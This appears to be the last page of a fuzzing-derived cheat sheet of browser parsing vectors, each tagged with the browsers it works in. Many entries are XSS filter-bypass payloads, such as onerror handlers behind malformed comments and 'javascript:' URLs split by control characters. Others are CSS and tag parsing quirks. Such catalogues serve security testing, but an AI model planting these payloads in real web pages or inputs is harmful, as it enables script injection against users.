Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 153 vectors with results

<!--- ><xmp>--><img src/onerror=alert(45)>-->
XSSHTML ParsingChromeFirefoxSafari
<div style="font-family:'x
;color:red;';">test</div>
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x0x0C;color:red;';">test</div>
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x0x0D;color:red;';">test</div>
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x';color:red;';">test</div>
HTMLCSS ParsingChromeFirefoxSafari
const c = String.fromCodePoint(i)0x0D
const c_lower = c.toLowerCase()0x0D
if (c_lower.length != c.length){0x0D
    alert(i)0x0D
}
JSJavaScript SyntaxChrome
<a id="0" href="j0x09avas0x09crip0x09t:window">craft-me</a>
XSSURL HandlingChromeFirefoxSafari
<a id="0" href="j
avas
crip
t:window">craft-me</a>
XSSURL HandlingChromeFirefoxSafari
<a id="0" href="j0x0Davas0x0Dcrip0x0Dt:window">craft-me</a>
XSSURL HandlingChromeFirefoxSafari
// 
alert(10)
JSXSS ExecutionChromeFirefoxSafari
// 0x0Dalert(13)
JSXSS ExecutionChromeFirefoxSafari
// alert(8232)
JSXSS ExecutionChromeFirefoxSafari
// alert(8233)
JSXSS ExecutionChromeFirefoxSafari
<div style=0x09color:red09></div>
HTMLCSS ParsingChromeFirefoxSafari
<div style=
color:red
></div>
HTMLCSS ParsingChromeFirefoxSafari
<div style=0x0Ccolor:red0C⟧></div>
HTMLCSS ParsingChromeFirefoxSafari
<div style=0x0Dcolor:red0D⟧></div>
HTMLCSS ParsingChromeFirefoxSafari
<div style= color:red ></div>
HTMLCSS ParsingChromeFirefoxSafari
<!----!><img/src/onerror=alert(1)>
HTMLHTML ParsingChromeFirefoxSafari
<!-----><img/src/onerror=alert(1)>
HTMLHTML ParsingChromeFirefoxSafari
<!---->><img/src/onerror=alert(1)>
HTMLHTML ParsingChromeFirefoxSafari
""
alert(10)
JSXSS ExecutionChromeFirefoxSafari
""0x0Dalert(13)
JSXSS ExecutionChromeFirefoxSafari
""%alert(37)
JSXSS ExecutionChromeFirefoxSafari
""&alert(38)
JSXSS ExecutionChromeFirefoxSafari
""*alert(42)
JSXSS ExecutionChromeFirefoxSafari
alert(10)

sdfasdfasfasfd
JSXSS ExecutionChromeSafariFirefox
alert(13)0x0D0x0Dsdfasdfasfasfd
JSXSS ExecutionChromeSafariFirefox
alert(38)&&sdfasdfasfasfd
JSXSS ExecutionChromeSafariFirefox
alert(42)**sdfasdfasfasfd
JSXSS ExecutionChromeSafariFirefox
alert(47)//sdfasdfasfasfd
JSXSS ExecutionChromeSafariFirefox
alert0x09(9)
JSXSS ExecutionChromeFirefoxSafari
alert
(10)
JSXSS ExecutionChromeFirefoxSafari
alert0x0B(11)
JSXSS ExecutionChromeFirefoxSafari
alert0x0C(12)
JSXSS ExecutionChromeFirefoxSafari
alert0x0D(13)
JSXSS ExecutionChromeFirefoxSafari
alert(9)09
JSXSS ExecutionChromeFirefoxSafari
alert(10)
JSXSS ExecutionChromeFirefoxSafari
alert(11)0x0B
JSXSS ExecutionChromeFirefoxSafari
alert(12)0x0C
JSXSS ExecutionChromeFirefoxSafari
alert(13)0x0D
JSXSS ExecutionChromeFirefoxSafari
console.alert()
alert(10)
JSXSS ExecutionChromeFirefoxSafari
console.alert()0x0Dalert(13)
JSXSS ExecutionChromeFirefoxSafari
console.alert()%alert(37)
JSXSS ExecutionChromeFirefoxSafari
console.alert()&alert(38)
JSXSS ExecutionChromeFirefoxSafari
console.alert()*alert(42)
JSXSS ExecutionChromeFirefoxSafari
<found0x09>
HTMLHTML ParsingChromeSafari
<found
>
HTMLHTML ParsingChromeSafari
<found0x0C>
HTMLHTML ParsingChromeSafari
<found0x0D>
HTMLHTML ParsingChromeSafari
<found >
HTMLHTML ParsingChromeSafari

Page 8 of 8